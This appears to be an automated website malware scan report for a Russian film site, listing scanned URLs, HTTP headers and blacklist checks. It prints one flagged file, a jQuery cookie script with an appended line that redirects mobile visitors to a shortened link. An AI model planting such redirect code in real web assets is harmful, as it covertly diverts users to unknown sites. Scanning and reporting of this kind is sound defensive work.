Scanned pages/files
Request | Server response | Status |
http://ars-kino.ru/ | 200 OK Content-Length: 77026 Content-Type: text/html | clean |
http://ars-kino.ru/engine/classes/min/index.php?charset=windows-1251&g=general&6 | 200 OK Content-Length: 179945 Content-Type: application/x-javascript | clean |
http://ars-kino.ru/templates/ars-kino/js/cookie.js | 200 OK Content-Length: 2172 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { options = options || {}; if (value === null) { value = ''; options.expires = -1; } var expires = ''; if (options.expires && (typeof options.expires == 'number' || options.expires.toUTCString)) { var date; if (typeof options.expires == 'number') { dat cookieValue = decodeURIComponent(cookie.substring(name.length + 1)); break; } } } return cookieValue; } };
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){ window.location="http://goo.gl/qkqWI"; }
Antivirus reports:
http://ars-kino.ru/engine/classes/js/tabs.js | 200 OK Content-Length: 270 Content-Type: application/x-javascript | clean |
http://ars-kino.ru/umedia.js | 200 OK Content-Length: 6083 Content-Type: application/x-javascript | clean |
http://ars-kino.ru/main/ | 404 Not Found Content-Length: 24858 Content-Type: text/html | clean |
http://ars-kino.ru/index.php?do=feedback | 200 OK Content-Length: 28188 Content-Type: text/html | clean |
http://ars-kino.ru/rss.xml | 200 OK Content-Length: 9061 Content-Type: application/xml | clean |
http://ars-kino.ru/test404page.js | 404 Not Found Content-Length: 21090 Content-Type: text/html | clean |
http://ars-kino.ru/js/jquery/jquery-1.4.4.min.js | 404 Not Found Content-Length: 21090 Content-Type: text/html | clean |
http://ars-kino.ru/js/site_navigation.js | 404 Not Found Content-Length: 21090 Content-Type: text/html | clean |
http://ars-kino.ru/js/ | 404 Not Found Content-Length: 24820 Content-Type: text/html | clean |
http://ars-kino.ru/js/login | 404 Not Found Content-Length: 24779 Content-Type: text/html | clean |
http://ars-kino.ru/index.php?do=register | 200 OK Content-Length: 26922 Content-Type: text/html | clean |
http://ars-kino.ru/login | 404 Not Found Content-Length: 24868 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ars-kino.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 22 Aug 2014 03:14:25 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Length: 77026
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=6e8708e9ac6deaa784b933bed7ac6a93; path=/
Set-Cookie: dle_user_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.ars-kino.ru; httponly
Set-Cookie: dle_password=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.ars-kino.ru; httponly
Set-Cookie: dle_hash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.ars-kino.ru; httponly
X-Powered-By: PHP/5.3.28
...77026 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ars-kino.ru
Referer: http://www.google.com/search?q=ars-kino.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ars-kino.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ars-kino.ru/
Result: ars-kino.ru is not infected or malware details are not published yet.